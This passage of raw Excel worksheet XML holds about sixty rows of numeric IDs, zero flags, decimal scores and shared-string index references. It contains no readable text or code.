        <v>6140</v>
      </c>
      <c r="D1118">
        <v>0</v>
      </c>
      <c r="E1118">
        <v>0.78030002117156982</v>
      </c>
      <c r="F1118" t="s">
        <v>7</v>
      </c>
      <c r="G1118" t="s">
        <v>2208</v>
      </c>
      <c r="H1118" t="s">
        <v>2209</v>
      </c>
    </row>
    <row r="1119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1119" s="1">
        <v>1117</v>
      </c>
      <c r="B1119">
        <v>6141</v>
      </c>
      <c r="C1119">
        <v>6141</v>
      </c>
      <c r="D1119">
        <v>0</v>
      </c>
      <c r="E1119">
        <v>0.37850001454353333</v>
      </c>
      <c r="F1119" t="s">
        <v>7</v>
      </c>
      <c r="G1119" t="s">
        <v>2210</v>
      </c>
      <c r="H1119" t="s">
        <v>2211</v>
      </c>
    </row>
    <row r="1120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1120" s="1">
        <v>1118</v>
      </c>
      <c r="B1120">
        <v>6142</v>
      </c>
      <c r="C1120">
        <v>6142</v>
      </c>
      <c r="D1120">
        <v>0</v>
      </c>
      <c r="E1120">
        <v>0.79769998788833618</v>
      </c>
      <c r="F1120" t="s">
        <v>7</v>
      </c>
      <c r="G1120" t="s">
        <v>2212</v>
      </c>
      <c r="H1120" t="s">
        <v>2213</v>
      </c>
    </row>
    <row r="1121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1121" s="1">
        <v>1119</v>
      </c>
      <c r="B1121">
        <v>6143</v>
      </c>
      <c r="C1121">
        <v>6143</v>
      </c>
      <c r="D1121">
        <v>0</v>
      </c>
      <c r="E1121">
        <v>0.9868999719619751</v>
      </c>
      <c r="F1121" t="s">
        <v>7</v>
      </c>
      <c r="G1121" t="s">
        <v>2214</v>
      </c>
      <c r="H1121" t="s">
        <v>2215</v>
      </c>
    </row>
    <row r="1122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1122" s="1">
        <v>1120</v>
      </c>
      <c r="B1122">
        <v>2530</v>
      </c>
      <c r="C1122">
        <v>2530</v>
      </c>
      <c r="D1122">
        <v>0</v>
      </c>
      <c r="E1122">
        <v>0.79180002212524414</v>
      </c>
      <c r="F1122" t="s">
        <v>7</v>
      </c>
      <c r="G1122" t="s">
        <v>2216</v>
      </c>
      <c r="H1122" t="s">
        <v>2217</v>
      </c>
    </row>
    <row r="1123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1123" s="1">
        <v>1121</v>
      </c>
      <c r="B1123">
        <v>6144</v>
      </c>
      <c r="C1123">
        <v>6144</v>
      </c>
      <c r="D1123">
        <v>0</v>
      </c>
      <c r="E1123">
        <v>0.55900001525878906</v>
      </c>
      <c r="F1123" t="s">
        <v>7</v>
      </c>
      <c r="G1123" t="s">
        <v>2218</v>
      </c>
      <c r="H1123" t="s">
        <v>2219</v>
      </c>
    </row>
    <row r="1124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1124" s="1">
        <v>1122</v>
      </c>
      <c r="B1124">
        <v>4237</v>
      </c>
      <c r="C1124">
        <v>4237</v>
      </c>
      <c r="D1124">
        <v>0</v>
      </c>
      <c r="E1124">
        <v>0.9976000189781189</v>
      </c>
      <c r="F1124" t="s">
        <v>7</v>
      </c>
      <c r="G1124" t="s">
        <v>2220</v>
      </c>
      <c r="H1124" t="s">
        <v>2221</v>
      </c>
    </row>
    <row r="1125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1125" s="1">
        <v>1123</v>
      </c>
      <c r="B1125">
        <v>2536</v>
      </c>
      <c r="C1125">
        <v>2536</v>
      </c>
      <c r="D1125">
        <v>0</v>
      </c>
      <c r="E1125">
        <v>0.62610000371932983</v>
      </c>
      <c r="F1125" t="s">
        <v>7</v>
      </c>
      <c r="G1125" t="s">
        <v>2222</v>
      </c>
      <c r="H1125" t="s">
        <v>2223</v>
      </c>
    </row>
    <row r="1126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1126" s="1">
        <v>1124</v>
      </c>
      <c r="B1126">
        <v>2538</v>
      </c>
      <c r="C1126">
        <v>2538</v>
      </c>
      <c r="D1126">
        <v>0</v>
      </c>
      <c r="E1126">
        <v>0.98940002918243408</v>
      </c>
      <c r="F1126" t="s">
        <v>7</v>
      </c>
      <c r="G1126" t="s">
        <v>2224</v>
      </c>
      <c r="H1126" t="s">
        <v>2225</v>
      </c>
    </row>
    <row r="1127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1127" s="1">
        <v>1125</v>
      </c>
      <c r="B1127">
        <v>6787</v>
      </c>
      <c r="C1127">
        <v>6787</v>
      </c>
      <c r="D1127">
        <v>0</v>
      </c>
      <c r="E1127">
        <v>0.7929999828338623</v>
      </c>
      <c r="F1127" t="s">
        <v>7</v>
      </c>
      <c r="G1127" t="s">
        <v>2226</v>
      </c>
      <c r="H1127" t="s">
        <v>2227</v>
      </c>
    </row>
    <row r="1128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1128" s="1">
        <v>1126</v>
      </c>
      <c r="B1128">
        <v>2551</v>
      </c>
      <c r="C1128">
        <v>2551</v>
      </c>
      <c r="D1128">
        <v>0</v>
      </c>
      <c r="E1128">
        <v>0.99900001287460327</v>
      </c>
      <c r="F1128" t="s">
        <v>7</v>
      </c>
      <c r="G1128" t="s">
        <v>2228</v>
      </c>
      <c r="H1128" t="s">
        <v>2229</v>
      </c>
    </row>
    <row r="1129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1129" s="1">
        <v>1127</v>
      </c>
      <c r="B1129">
        <v>6781</v>
      </c>
      <c r="C1129">
        <v>6781</v>
      </c>
      <c r="D1129">
        <v>0</v>
      </c>
      <c r="E1129">
        <v>0.70679998397827148</v>
      </c>
      <c r="F1129" t="s">
        <v>7</v>
      </c>
      <c r="G1129" t="s">
        <v>2230</v>
      </c>
      <c r="H1129" t="s">
        <v>2231</v>
      </c>
    </row>
    <row r="1130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1130" s="1">
        <v>1128</v>
      </c>
      <c r="B1130">
        <v>2556</v>
      </c>
      <c r="C1130">
        <v>2556</v>
      </c>
      <c r="D1130">
        <v>0</v>
      </c>
      <c r="E1130">
        <v>0.3497999906539917</v>
      </c>
      <c r="F1130" t="s">
        <v>7</v>
      </c>
      <c r="G1130" t="s">
        <v>2232</v>
      </c>
      <c r="H1130" t="s">
        <v>2233</v>
      </c>
    </row>
    <row r="1131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1131" s="1">
        <v>1129</v>
      </c>
      <c r="B1131">
        <v>2557</v>
      </c>
      <c r="C1131">
        <v>2557</v>
      </c>
      <c r="D1131">
        <v>0</v>
      </c>
      <c r="E1131">
        <v>0.83660000562667847</v>
      </c>
      <c r="F1131" t="s">
        <v>7</v>
      </c>
      <c r="G1131" t="s">
        <v>2234</v>
      </c>
      <c r="H1131" t="s">
        <v>2235</v>
      </c>
    </row>
    <row r="1132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1132" s="1">
        <v>1130</v>
      </c>
      <c r="B1132">
        <v>2613</v>
      </c>
      <c r="C1132">
        <v>2613</v>
      </c>
      <c r="D1132">
        <v>0</v>
      </c>
      <c r="E1132">
        <v>0.62449997663497925</v>
      </c>
      <c r="F1132" t="s">
        <v>7</v>
      </c>
      <c r="G1132" t="s">
        <v>2236</v>
      </c>
      <c r="H1132" t="s">
        <v>2237</v>
      </c>
    </row>
    <row r="1133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1133" s="1">
        <v>1131</v>
      </c>
      <c r="B1133">
        <v>3111</v>
      </c>
      <c r="C1133">
        <v>3111</v>
      </c>
      <c r="D1133">
        <v>0</v>
      </c>
      <c r="E1133">
        <v>0.60659998655319214</v>
      </c>
      <c r="F1133" t="s">
        <v>7</v>
      </c>
      <c r="G1133" t="s">
        <v>2238</v>
      </c>
      <c r="H1133" t="s">
        <v>2239</v>
      </c>
    </row>
    <row r="1134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1134" s="1">
        <v>1132</v>
      </c>
      <c r="B1134">
        <v>2797</v>
      </c>
      <c r="C1134">
        <v>2797</v>
      </c>
      <c r="D1134">
        <v>0</v>
      </c>
      <c r="E1134">
        <v>0.99849998950958252</v>
      </c>
      <c r="F1134" t="s">
        <v>7</v>
      </c>
      <c r="G1134" t="s">
        <v>2240</v>
      </c>
      <c r="H1134" t="s">
        <v>2241</v>
      </c>
    </row>
    <row r="1135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1135" s="1">
        <v>1133</v>
      </c>
      <c r="B1135">
        <v>6212</v>
      </c>
      <c r="C1135">
        <v>6212</v>
      </c>
      <c r="D1135">
        <v>0</v>
      </c>
      <c r="E1135">
        <v>0.83719998598098755</v>
      </c>
      <c r="F1135" t="s">
        <v>7</v>
      </c>
      <c r="G1135" t="s">
        <v>2242</v>
      </c>
      <c r="H1135" t="s">
        <v>2243</v>
      </c>
    </row>
    <row r="1136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1136" s="1">
        <v>1134</v>
      </c>
      <c r="B1136">
        <v>3020</v>
      </c>
      <c r="C1136">
        <v>3020</v>
      </c>
      <c r="D1136">
        <v>0</v>
      </c>
      <c r="E1136">
        <v>0.54500001668930054</v>
      </c>
      <c r="F1136" t="s">
        <v>7</v>
      </c>
      <c r="G1136" t="s">
        <v>2244</v>
      </c>
      <c r="H1136" t="s">
        <v>2245</v>
      </c>
    </row>
    <row r="1137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1137" s="1">
        <v>1135</v>
      </c>
      <c r="B1137">
        <v>6264</v>
      </c>
      <c r="C1137">
        <v>6264</v>
      </c>
      <c r="D1137">
        <v>0</v>
      </c>
      <c r="E1137">
        <v>0.55239999294281006</v>
      </c>
      <c r="F1137" t="s">
        <v>7</v>
      </c>
      <c r="G1137" t="s">
        <v>2246</v>
      </c>
      <c r="H1137" t="s">
        <v>2247</v>
      </c>
    </row>
    <row r="1138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1138" s="1">
        <v>1136</v>
      </c>
      <c r="B1138">
        <v>3023</v>
      </c>
      <c r="C1138">
        <v>3023</v>
      </c>
      <c r="D1138">
        <v>0</v>
      </c>
      <c r="E1138">
        <v>0.9814000129699707</v>
      </c>
      <c r="F1138" t="s">
        <v>7</v>
      </c>
      <c r="G1138" t="s">
        <v>2248</v>
      </c>
      <c r="H1138" t="s">
        <v>2249</v>
      </c>
    </row>
    <row r="1139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1139" s="1">
        <v>1137</v>
      </c>
      <c r="B1139">
        <v>3024</v>
      </c>
      <c r="C1139">
        <v>3024</v>
      </c>
      <c r="D1139">
        <v>0</v>
      </c>
      <c r="E1139">
        <v>0.78380000591278076</v>
      </c>
      <c r="F1139" t="s">
        <v>7</v>
      </c>
      <c r="G1139" t="s">
        <v>2250</v>
      </c>
      <c r="H1139" t="s">
        <v>2251</v>
      </c>
    </row>
    <row r="1140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1140" s="1">
        <v>1138</v>
      </c>
      <c r="B1140">
        <v>3025</v>
      </c>
      <c r="C1140">
        <v>3025</v>
      </c>
      <c r="D1140">
        <v>0</v>
      </c>
      <c r="E1140">
        <v>0.99769997596740723</v>
      </c>
      <c r="F1140" t="s">
        <v>7</v>
      </c>
      <c r="G1140" t="s">
        <v>2252</v>
      </c>
      <c r="H1140" t="s">
        <v>2253</v>
      </c>
    </row>
    <row r="1141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1141" s="1">
        <v>1139</v>
      </c>
      <c r="B1141">
        <v>6266</v>
      </c>
      <c r="C1141">
        <v>6266</v>
      </c>
      <c r="D1141">
        <v>0</v>
      </c>
      <c r="E1141">
        <v>0.97359997034072876</v>
      </c>
      <c r="F1141" t="s">
        <v>7</v>
      </c>
      <c r="G1141" t="s">
        <v>2254</v>
      </c>
      <c r="H1141" t="s">
        <v>2255</v>
      </c>
    </row>
    <row r="1142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1142" s="1">
        <v>1140</v>
      </c>
      <c r="B1142">
        <v>3940</v>
      </c>
      <c r="C1142">
        <v>3940</v>
      </c>
      <c r="D1142">
        <v>0</v>
      </c>
      <c r="E1142">
        <v>0.74739998579025269</v>
      </c>
      <c r="F1142" t="s">
        <v>7</v>
      </c>
      <c r="G1142" t="s">
        <v>2256</v>
      </c>
      <c r="H1142" t="s">
        <v>2257</v>
      </c>
    </row>
    <row r="1143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1143" s="1">
        <v>1141</v>
      </c>
      <c r="B1143">
        <v>3945</v>
      </c>
      <c r="C1143">
        <v>3945</v>
      </c>
      <c r="D1143">
        <v>0</v>
      </c>
      <c r="E1143">
        <v>0.55559998750686646</v>
      </c>
      <c r="F1143" t="s">
        <v>7</v>
      </c>
      <c r="G1143" t="s">
        <v>2258</v>
      </c>
      <c r="H1143" t="s">
        <v>2259</v>
      </c>
    </row>
    <row r="1144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1144" s="1">
        <v>1142</v>
      </c>
      <c r="B1144">
        <v>3030</v>
      </c>
      <c r="C1144">
        <v>3030</v>
      </c>
      <c r="D1144">
        <v>0</v>
      </c>
      <c r="E1144">
        <v>0.62129998207092285</v>
      </c>
      <c r="F1144" t="s">
        <v>7</v>
      </c>
      <c r="G1144" t="s">
        <v>2260</v>
      </c>
      <c r="H1144" t="s">
        <v>2261</v>
      </c>
    </row>
    <row r="1145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1145" s="1">
        <v>1143</v>
      </c>
      <c r="B1145">
        <v>3036</v>
      </c>
      <c r="C1145">
        <v>3036</v>
      </c>
      <c r="D1145">
        <v>0</v>
      </c>
      <c r="E1145">
        <v>0.65729999542236328</v>
      </c>
      <c r="F1145" t="s">
        <v>7</v>
      </c>
      <c r="G1145" t="s">
        <v>2262</v>
      </c>
      <c r="H1145" t="s">
        <v>2263</v>
      </c>
    </row>
    <row r="1146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1146" s="1">
        <v>1144</v>
      </c>
      <c r="B1146">
        <v>3934</v>
      </c>
      <c r="C1146">
        <v>3934</v>
      </c>
      <c r="D1146">
        <v>0</v>
      </c>
      <c r="E1146">
        <v>0.82980000972747803</v>
      </c>
      <c r="F1146" t="s">
        <v>7</v>
      </c>
      <c r="G1146" t="s">
        <v>2264</v>
      </c>
      <c r="H1146" t="s">
        <v>2265</v>
      </c>
    </row>
    <row r="1147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1147" s="1">
        <v>1145</v>
      </c>
      <c r="B1147">
        <v>3041</v>
      </c>
      <c r="C1147">
        <v>3041</v>
      </c>
      <c r="D1147">
        <v>0</v>
      </c>
      <c r="E1147">
        <v>0.99800002574920654</v>
      </c>
      <c r="F1147" t="s">
        <v>7</v>
      </c>
      <c r="G1147" t="s">
        <v>2266</v>
      </c>
      <c r="H1147" t="s">
        <v>2267</v>
      </c>
    </row>
    <row r="1148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1148" s="1">
        <v>1146</v>
      </c>
      <c r="B1148">
        <v>6267</v>
      </c>
      <c r="C1148">
        <v>6267</v>
      </c>
      <c r="D1148">
        <v>0</v>
      </c>
      <c r="E1148">
        <v>0.54839998483657837</v>
      </c>
      <c r="F1148" t="s">
        <v>7</v>
      </c>
      <c r="G1148" t="s">
        <v>2268</v>
      </c>
      <c r="H1148" t="s">
        <v>2269</v>
      </c>
    </row>
    <row r="1149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1149" s="1">
        <v>1147</v>
      </c>
      <c r="B1149">
        <v>6268</v>
      </c>
      <c r="C1149">
        <v>6268</v>
      </c>
      <c r="D1149">
        <v>0</v>
      </c>
      <c r="E1149">
        <v>0.98610001802444458</v>
      </c>
      <c r="F1149" t="s">
        <v>7</v>
      </c>
      <c r="G1149" t="s">
        <v>2270</v>
      </c>
      <c r="H1149" t="s">
        <v>2271</v>
      </c>
    </row>
    <row r="1150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1150" s="1">
        <v>1148</v>
      </c>
      <c r="B1150">
        <v>3930</v>
      </c>
      <c r="C1150">
        <v>3930</v>
      </c>
      <c r="D1150">
        <v>0</v>
      </c>
      <c r="E1150">
        <v>0.65729999542236328</v>
      </c>
      <c r="F1150" t="s">
        <v>7</v>
      </c>
      <c r="G1150" t="s">
        <v>2272</v>
      </c>
      <c r="H1150" t="s">
        <v>2273</v>
      </c>
    </row>
    <row r="1151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1151" s="1">
        <v>1149</v>
      </c>
      <c r="B1151">
        <v>3048</v>
      </c>
      <c r="C1151">
        <v>3048</v>
      </c>
      <c r="D1151">
        <v>0</v>
      </c>
      <c r="E1151">
        <v>0.97140002250671387</v>
      </c>
      <c r="F1151" t="s">
        <v>7</v>
      </c>
      <c r="G1151" t="s">
        <v>2274</v>
      </c>
      <c r="H1151" t="s">
        <v>2275</v>
      </c>
    </row>
    <row r="1152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1152" s="1">
        <v>1150</v>
      </c>
      <c r="B1152">
        <v>3032</v>
      </c>
      <c r="C1152">
        <v>3032</v>
      </c>
      <c r="D1152">
        <v>0</v>
      </c>
      <c r="E1152">
        <v>0.96579998731613159</v>
      </c>
      <c r="F1152" t="s">
        <v>7</v>
      </c>
      <c r="G1152" t="s">
        <v>2276</v>
      </c>
      <c r="H1152" t="s">
        <v>2277</v>
      </c>
    </row>
    <row r="1153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1153" s="1">
        <v>1151</v>
      </c>
      <c r="B1153">
        <v>3926</v>
      </c>
      <c r="C1153">
        <v>3926</v>
      </c>
      <c r="D1153">
        <v>0</v>
      </c>
      <c r="E1153">
        <v>0.65689998865127563</v>
      </c>
      <c r="F1153" t="s">
        <v>7</v>
      </c>
      <c r="G1153" t="s">
        <v>2278</v>
      </c>
      <c r="H1153" t="s">
        <v>2279</v>
      </c>
    </row>
    <row r="1154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1154" s="1">
        <v>1152</v>
      </c>
      <c r="B1154">
        <v>3946</v>
      </c>
      <c r="C1154">
        <v>3946</v>
      </c>
      <c r="D1154">
        <v>0</v>
      </c>
      <c r="E1154">
        <v>0.91710001230239868</v>
      </c>
      <c r="F1154" t="s">
        <v>7</v>
      </c>
      <c r="G1154" t="s">
        <v>2280</v>
      </c>
      <c r="H1154" t="s">
        <v>2281</v>
      </c>
    </row>
    <row r="1155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1155" s="1">
        <v>1153</v>
      </c>
      <c r="B1155">
        <v>3013</v>
      </c>
      <c r="C1155">
        <v>3013</v>
      </c>
      <c r="D1155">
        <v>0</v>
      </c>
      <c r="E1155">
        <v>0.56110000610351563</v>
      </c>
      <c r="F1155" t="s">
        <v>7</v>
      </c>
      <c r="G1155" t="s">
        <v>2282</v>
      </c>
      <c r="H1155" t="s">
        <v>2283</v>
      </c>
    </row>
    <row r="1156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1156" s="1">
        <v>1154</v>
      </c>
      <c r="B1156">
        <v>6596</v>
      </c>
      <c r="C1156">
        <v>6596</v>
      </c>
      <c r="D1156">
        <v>0</v>
      </c>
      <c r="E1156">
        <v>0.89289999008178711</v>
      </c>
      <c r="F1156" t="s">
        <v>7</v>
      </c>
      <c r="G1156" t="s">
        <v>2284</v>
      </c>
      <c r="H1156" t="s">
        <v>2285</v>
      </c>
    </row>
    <row r="1157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1157" s="1">
        <v>1155</v>
      </c>
      <c r="B1157">
        <v>2976</v>
      </c>
      <c r="C1157">
        <v>2976</v>
      </c>
      <c r="D1157">
        <v>0</v>
      </c>
      <c r="E1157">
        <v>0.94700002670288086</v>
      </c>
      <c r="F1157" t="s">
        <v>7</v>
      </c>
      <c r="G1157" t="s">
        <v>2286</v>
      </c>
      <c r="H1157" t="s">
        <v>2287</v>
      </c>
    </row>
    <row r="1158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1158" s="1">
        <v>1156</v>
      </c>
      <c r="B1158">
        <v>6593</v>
      </c>
      <c r="C1158">
        <v>6593</v>
      </c>
      <c r="D1158">
        <v>0</v>
      </c>
      <c r="E1158">
        <v>0.99800002574920654</v>
      </c>
      <c r="F1158" t="s">
        <v>7</v>
      </c>
      <c r="G1158" t="s">
        <v>2288</v>
      </c>
      <c r="H1158" t="s">
        <v>2289</v>
      </c>
    </row>
    <row r="1159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1159" s="1">
        <v>1157</v>
      </c>
      <c r="B1159">
        <v>2984</v>
      </c>
      <c r="C1159">
        <v>2984</v>
      </c>
      <c r="D1159">
        <v>0</v>
      </c>
      <c r="E1159">
        <v>0.99720001220703125</v>
      </c>
      <c r="F1159" t="s">
        <v>7</v>
      </c>
      <c r="G1159" t="s">
        <v>2290</v>
      </c>
      <c r="H1159" t="s">
        <v>2291</v>
      </c>
    </row>
    <row r="1160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1160" s="1">
        <v>1158</v>
      </c>
      <c r="B1160">
        <v>6254</v>
      </c>
      <c r="C1160">
        <v>6254</v>
      </c>
      <c r="D1160">
        <v>0</v>
      </c>
      <c r="E1160">
        <v>0.58240002393722534</v>
      </c>
      <c r="F1160" t="s">
        <v>7</v>
      </c>
      <c r="G1160" t="s">
        <v>2292</v>
      </c>
      <c r="H1160" t="s">
        <v>2293</v>
      </c>
    </row>
    <row r="1161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1161" s="1">
        <v>1159</v>
      </c>
      <c r="B1161">
        <v>3961</v>
      </c>
      <c r="C1161">
        <v>3961</v>
      </c>
      <c r="D1161">
        <v>0</v>
      </c>
      <c r="E1161">
        <v>0.5242999792098999</v>
      </c>
      <c r="F1161" t="s">
        <v>7</v>
      </c>
      <c r="G1161" t="s">
        <v>2294</v>
      </c>
      <c r="H1161" t="s">
        <v>2295</v>
      </c>
    </row>
    <row r="1162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1162" s="1">
        <v>1160</v>
      </c>
      <c r="B1162">
        <v>2989</v>
      </c>
      <c r="C1162">
        <v>2989</v>
      </c>
      <c r="D1162">
        <v>0</v>
      </c>
      <c r="E1162">
        <v>0.48649999499320978</v>
      </c>
      <c r="F1162" t="s">
        <v>7</v>
      </c>
      <c r="G1162" t="s">
        <v>2296</v>
      </c>
      <c r="H1162" t="s">
        <v>2297</v>
      </c>
    </row>
    <row r="1163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1163" s="1">
        <v>1161</v>
      </c>
      <c r="B1163">
        <v>3014</v>
      </c>
      <c r="C1163">
        <v>3014</v>
      </c>
      <c r="D1163">
        <v>0</v>
      </c>
      <c r="E1163">
        <v>0.70160001516342163</v>
      </c>
      <c r="F1163" t="s">
        <v>7</v>
      </c>
      <c r="G1163" t="s">
        <v>2298</v>
      </c>
      <c r="H1163" t="s">
        <v>2299</v>
      </c>
    </row>
    <row r="1164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1164" s="1">
        <v>1162</v>
      </c>
      <c r="B1164">
        <v>6258</v>
      </c>
      <c r="C1164">
        <v>6258</v>
      </c>
      <c r="D1164">
        <v>0</v>
      </c>
      <c r="E1164">
        <v>0.8562999963760376</v>
      </c>
      <c r="F1164" t="s">
        <v>7</v>
      </c>
      <c r="G1164" t="s">
        <v>2300</v>
      </c>
      <c r="H1164" t="s">
        <v>2301</v>
      </c>
    </row>
    <row r="1165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1165" s="1">
        <v>1163</v>
      </c>
      <c r="B1165">
        <v>6586</v>
      </c>
      <c r="C1165">
        <v>6586</v>
      </c>
      <c r="D1165">
        <v>0</v>
      </c>
      <c r="E1165">
        <v>0.82959997653961182</v>
      </c>
      <c r="F1165" t="s">
        <v>7</v>
      </c>
      <c r="G1165" t="s">
        <v>2302</v>
      </c>
      <c r="H1165" t="s">
        <v>2303</v>
      </c>
    </row>
    <row r="1166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1166" s="1">
        <v>1164</v>
      </c>
      <c r="B1166">
        <v>6585</v>
      </c>
      <c r="C1166">
        <v>6585</v>
      </c>
      <c r="D1166">
        <v>0</v>
      </c>
      <c r="E1166">
        <v>0.73409998416900635</v>
      </c>
      <c r="F1166" t="s">
        <v>7</v>
      </c>
      <c r="G1166" t="s">
        <v>2304</v>
      </c>
      <c r="H1166" t="s">
        <v>2305</v>
      </c>
    </row>
    <row r="1167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1167" s="1">
        <v>1165</v>
      </c>
      <c r="B1167">
        <v>3956</v>
      </c>
      <c r="C1167">
        <v>3956</v>
      </c>
      <c r="D1167">
        <v>0</v>
      </c>
      <c r="E1167">
        <v>0.37259998917579651</v>
      </c>
      <c r="F1167" t="s">
        <v>7</v>
      </c>
      <c r="G1167" t="s">
        <v>2306</v>
      </c>
      <c r="H1167" t="s">
        <v>2307</v>
      </c>
    </row>
    <row r="1168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1168" s="1">
        <v>1166</v>
      </c>
      <c r="B1168">
        <v>3001</v>
      </c>
      <c r="C1168">
        <v>3001</v>
      </c>
      <c r="D1168">
        <v>0</v>
      </c>
      <c r="E1168">
        <v>0.99360001087188721</v>
      </c>
      <c r="F1168" t="s">
        <v>7</v>
      </c>
      <c r="G1168" t="s">
        <v>2308</v>
      </c>
      <c r="H1168" t="s">
        <v>2309</v>
      </c>
    </row>
    <row r="1169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1169" s="1">
        <v>1167</v>
      </c>
      <c r="B1169">
        <v>3003</v>
      </c>
      <c r="C1169">
        <v>3003</v>
      </c>
      <c r="D1169">
        <v>0</v>
      </c>
      <c r="E1169">
        <v>0.88910001516342163</v>
      </c>
      <c r="F1169" t="s">
        <v>7</v>
      </c>
      <c r="G1169" t="s">
        <v>2310</v>
      </c>
      <c r="H1169" t="s">
        <v>2311</v>
      </c>
    </row>
    <row r="1170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1170" s="1">
        <v>1168</v>
      </c>
      <c r="B1170">
        <v>6581</v>
      </c>
      <c r="C1170">
        <v>6581</v>
      </c>
      <c r="D1170">
        <v>0</v>
      </c>
      <c r="E1170">
        <v>0.74639999866485596</v>
      </c>
      <c r="F1170" t="s">
        <v>7</v>
      </c>
      <c r="G1170" t="s">
        <v>2312</v>
      </c>
      <c r="H1170" t="s">
        <v>2313</v>
      </c>
    </row>
    <row r="1171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1171" s="1">
        <v>1169</v>
      </c>
      <c r="B1171">
        <v>3007</v>
      </c>
      <c r="C1171">
        <v>3007</v>
      </c>
      <c r="D1171">
        <v>0</v>
      </c>
      <c r="E1171">
        <v>0.56889998912811279</v>
      </c>
      <c r="F1171" t="s">
        <v>7</v>
      </c>
      <c r="G1171" t="s">
        <v>2314</v>
      </c>
      <c r="H1171" t="s">
        <v>2315</v>
      </c>
    </row>
    <row r="1172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1172" s="1">
        <v>1170</v>
      </c>
      <c r="B1172">
        <v>2993</v>
      </c>
      <c r="C1172">
        <v>2993</v>
      </c>
      <c r="D1172">
        <v>0</v>
      </c>
      <c r="E1172">
        <v>0.66439998149871826</v>
      </c>
      <c r="F1172" t="s">
        <v>7</v>
      </c>
      <c r="G1172" t="s">
        <v>2316</v>
      </c>
      <c r="H1172" t="s">
        <v>2317</v>
      </c>
    </row>
    <row r="1173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1173" s="1">
        <v>1171</v>
      </c>
      <c r="B1173">
        <v>6569</v>
      </c>
      <c r="C1173">
        <v>6569</v>
      </c>
      <c r="D1173">
        <v>0</v>
      </c>
      <c r="E1173">
        <v>0.99870002269744873</v>
      </c>
      <c r="F1173" t="s">
        <v>7</v>
      </c>
      <c r="G1173" t="s">
        <v>2318</v>
      </c>
      <c r="H1173" t="s">
        <v>2319</v>
      </c>
    </row>
    <row r="1174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1174" s="1">
        <v>1172</v>
      </c>
      <c r="B1174">
        <v>3923</v>
      </c>
      <c r="C1174">
        <v>3923</v>
      </c>
      <c r="D1174">
        <v>0</v>
      </c>
      <c r="E1174">
        <v>0.80140000581741333</v>
      </c>
      <c r="F1174" t="s">
        <v>7</v>
      </c>
      <c r="G1174" t="s">
        <v>2320</v>
      </c>
      <c r="H1174" t="s">
        <v>2321</v>
      </c>
    </row>
    <row r="1175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1175" s="1">
        <v>1173</v>
      </c>
      <c r="B1175">
        <v>3056</v>
      </c>
      <c r="C1175">
        <v>3056</v>
      </c>
      <c r="D1175">
        <v>0</v>
      </c>
      <c r="E1175">
        <v>0.99610000848770142</v>
      </c>
      <c r="F1175" t="s">
        <v>7</v>
      </c>
      <c r="G1175" t="s">
        <v>2322</v>
      </c>
      <c r="H1175" t="s">
        <v>2323</v>
      </c>
    </row>
    <row r="1176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1176" s="1">
        <v>1174</v>
      </c>
      <c r="B1176">
        <v>3091</v>
      </c>
      <c r="C1176">
        <v>3091</v>
      </c>
      <c r="D1176">
        <v>0</v>
      </c>
      <c r="E1176">
        <v>0.86930000782012939</v>
      </c>
      <c r="F1176" t="s">
        <v>7</v>
      </c>
      <c r="G1176" t="s">
        <v>2324</v>
      </c>
      <c r="H1176" t="s">
        <v>2325</v>
